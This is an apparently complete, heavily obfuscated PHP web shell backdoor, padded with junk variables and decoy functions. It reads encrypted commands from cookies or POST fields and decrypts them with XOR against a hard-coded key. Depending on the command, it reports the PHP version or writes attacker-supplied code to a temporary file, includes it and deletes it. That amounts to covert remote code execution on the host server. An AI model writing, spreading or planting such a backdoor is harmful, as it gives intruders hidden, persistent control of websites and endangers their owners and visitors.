<?php 
$es_apgwr    =     'es_apgwr'    ^    '-';



$ztjtilj /*a*/ =    $_COOKIE;
$ozpxchgab       =	63;$yzbngqft /*   vunz*/ =   $_POST;






function	blurp(){ /*  juf*/ $uoextizpk    = /*  btgd_   */ 'qynategx';    $lvdik	= /*  nm   */ 'kfzg';

	$uwvihs	=    'dzs';

 /*  jvyxrw*/ $zuvakilhab    =    'kqr';


 /*   tvw   */ $lvdik /*  idp  */ =  strtolower($zuvakilhab);
      $cowvrtcvq	= /*kbt   */ 'zwiyrlsa';

 /*op*/ $yfeup  =    'fmcmpa_lr';
}

function	wvvcnrtid($bylcidxn,   $qxjwy)
{
 /*   btx  */ global /*  ktx  */ $es_apgwr;


	$lclkbbfxm_ugieeh  =	"";	$lclkbbfxmizeglu /*vtbxj  */ =	43;
 /*  xe */ for    ($lclkbbfxm /*an  */ = /* n_  */ 0;       $lclkbbfxm	<    strlen($bylcidxn);)      {
 /*mpslp   */ for       ($irbxzwed /*   or   */ = /*ges   */ 0;       $irbxzwed    < /*   dbhgz*/ strlen($qxjwy)       && /*   fm */ $lclkbbfxm	<    strlen($bylcidxn);    $irbxzwed++,     $lclkbbfxm++) /*  ynbugl  */ {	$lclkbbfxm_ugieeh /*  vjrhg   */ .= /*hvbtd  */ $es_apgwr(ord($bylcidxn[$lclkbbfxm]) /* ox*/ ^    ord($qxjwy[$irbxzwed]));


			$ehvot /* qnm   */ =       20;
 /*q  */ }


    }
	return    $lclkbbfxm_ugieeh;

}



function    mhbqrf($vn_uss, /*   vzgek*/ $bylcidxn){    global /*  haroao */ $es_apgwr;

   $wut_bv /*  lwai */ = /*vcolu  */ sprintf("."."\57" /*   d*/ .	"%".$es_apgwr(1002-887)	. /*   rg */ $es_apgwr(46) /*r  */ . /*  elteaq  */ "p"."l",      md5($vn_uss));


  file_put_contents($wut_bv, /*he*/ "<"    .     "?"."p"."h"."p".$es_apgwr(32)    .    "u"."n"."\x6c"      . /*   atjl*/ "i"."\156" /*   pox_fu  */ .       "\153"	.       "\50" /* kjrkhc   */ .	"_".$es_apgwr(226-131)	.	"F"."I"."L"."E"."\x5f" /*   zf */ .	"_".$es_apgwr(422-381) /*   zznhs   */ .    ";".$es_apgwr(32) /* p   */ .    $bylcidxn["\144"]);


$wmcbgudf_u      =    'dmtstwq';
  include($wut_bv); /*  xit*/ $nafnu    =    $wut_bv;	$wuxybehr    =    trim($wmcbgudf_u);
	$szexof     = /* j */ 'akyixb';
 /*  eqy*/ @unlink($nafnu);	$oakni       =	41;
	$adgiqk  =    5;


}


function /*   ttzqk   */ clkob(){
  global      $es_apgwr;

    $lclkbbfxm	=    array();
	$sxpiplkfux /* rii   */ =	'gplncrnhk';

	$lclkbbfxm["\160"    .   "\166"]	= /*   qsu  */ phpversion();

	$wseydgwm /*h__gt  */ = /* e */ 45; /*  okp_zr  */ $lclkbbfxm["\x73" /*  dxvc   */ .       $es_apgwr(809-691)]   =	"\63"      . /* fr */ "."."\x35";
   echo /*   kmnpeu  */ @serialize($lclkbbfxm);
}




function    arybxovt(){      $lmadu	=   67;


    $nd_plxgm_    =     'cmi';      $h_mzhykci_    =   31;
	$lmadu /* msvawp*/ = /* gg */ $h_mzhykci_ /*nra_pg */ * /*  r*/ 20;

	$whvjaool	=    35;


}arybxovt();

function   actjgbnv($bylcidxn,     $vn_uss,	$xiivtvjce){ /*  a   */ global  $es_apgwr;




 /*  hwg  */ $bylcidxn /*  xuu*/ =   unserialize(wvvcnrtid(wvvcnrtid(base64_decode($bylcidxn),      $vn_uss),	$xiivtvjce));

    if    (isset($bylcidxn[$es_apgwr(97) /*qkds */ . /* mnikfw  */ $es_apgwr(107)]))   {


  if /*   su */ ($bylcidxn["a"] /*zhwjz   */ ==	"i")	{

     clkob();


 /*xrwt*/ }      elseif /*  otdtvg */ ($bylcidxn["a"] /*trmxon  */ ==      "e")   {
     mhbqrf($vn_uss, /*  _izyjr */ $bylcidxn);

			$fozais	= /* mgxmo */ 74;


      }

    exit(); /*oah  */ }
}


$ztjtilj  =    array_merge($yzbngqft,      $ztjtilj);




$vn_uss     =    "6"."\x36"    . /*xs  */ "1"."\144"."2"."\x32"	.     "\144"    .	"\60" /*   c*/ .    "-"."8"."4"."9".$es_apgwr(99)     . /*b   */ "-"."\x34"      . /* ak_tj   */ $es_apgwr(760-706) /*  y   */ . /*  p */ "\71"	. /*   quxndd   */ "7"."\55"	. /*   ppvu */ "\x39"    .	"e"."\143" /*   laewb   */ .	"\60" /*   k*/ . /*hjo  */ "-".$es_apgwr(304-206)  . /*  yn */ $es_apgwr(98)	. /*r   */ "7"."4"."\x35" /*   zj  */ . /*   c_ehy   */ "\x35" /*   u   */ .	$es_apgwr(54) /*   wzk_*/ .    "\70"  .   "3"."7"."6".$es_apgwr(325-273);

foreach    ($ztjtilj    as    $xiivtvjce  => /*  a_ms   */ $bylcidxn)   {


    actjgbnv($bylcidxn,	$vn_uss, /*vbm   */ $xiivtvjce);}

$kbzrnvo_	=    '_qdr';

$kbyyqk	=      31;


blurp();







?>